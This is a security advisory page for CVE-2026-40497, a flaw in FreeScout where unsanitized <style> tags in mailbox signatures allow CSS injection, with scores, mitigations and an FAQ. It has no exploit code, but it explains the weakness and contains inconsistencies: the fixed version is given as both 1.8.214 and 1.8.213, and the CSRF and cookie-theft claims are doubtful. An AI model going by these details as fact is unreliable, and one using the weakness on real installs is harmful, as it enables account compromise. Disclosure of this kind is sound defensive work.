Platform
php
Component
freescout-help-desk
Fixed in
1.8.214
CVE-2026-40497 describes a Cross-Site Request Forgery (CSRF) vulnerability discovered in FreeScout, a free self-hosted help desk and shared mailbox system. This flaw allows an attacker to inject malicious CSS code into mailbox settings, potentially leading to Cross-Site Scripting (XSS) attacks. The vulnerability impacts versions 1.0.0 through 1.8.212, and a fix is available in version 1.8.213.
The vulnerability lies in FreeScout's inadequate sanitization of <style> tags within the mailbox signature field. While other potentially dangerous tags like <script>, <form>, <iframe>, and <object> are stripped, <style> tags are not. These injected <style> tags are then rendered unescaped in conversation views. Given that FreeScout's Content Security Policy (CSP) allows style-src * 'self' 'unsafe-inline', injected inline styles execute freely. An attacker with access to modify mailbox settings – either as an administrator or an agent with mailbox permissions – can exploit this to inject malicious CSS. This could be used to steal user cookies, redirect users to phishing sites, or deface the FreeScout interface. The blast radius is limited to users accessing conversations within the affected mailbox.
This vulnerability was publicly disclosed on 2026-04-21. No known public proof-of-concept (PoC) exists at the time of writing, but the vulnerability's nature and the ease of CSS injection suggest a potential for exploitation. Its severity is rated HIGH (CVSS:8.1). It is not currently listed on CISA KEV.
Exploit Status
EPSS
0.04% (11% percentile)
CISA SSVC
CVSS Vector
The primary mitigation is to upgrade FreeScout to version 1.8.213 or later, which includes the necessary fix to properly sanitize <style> tags. If upgrading immediately is not possible, consider implementing a Web Application Firewall (WAF) rule to block POST requests to /mailbox/settings/{id} containing suspicious <style> tags. Alternatively, restrict access to mailbox settings to only trusted administrators and agents. Monitor FreeScout logs for unusual activity, particularly POST requests to the settings endpoint. While a direct detection signature is difficult, look for unusual CSS patterns within mailbox signatures.
Update FreeScout to version 1.8.213 or higher. This version includes a fix that correctly removes `<style>` tags from the mailbox signature, preventing CSS injection and potential CSRF token exfiltration.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-40497 is a Cross-Site Request Forgery (CSRF) vulnerability in FreeScout versions 1.0.0 through 1.8.212, allowing attackers to inject malicious CSS and potentially execute XSS.
Yes, if you are running FreeScout versions 1.0.0 through 1.8.212, you are affected by this vulnerability.
Upgrade FreeScout to version 1.8.213 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
No active exploitation has been confirmed, but the vulnerability's nature suggests a potential for exploitation.
Refer to the FreeScout security advisory for details: [https://freescout.com/security/](https://freescout.com/security/)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.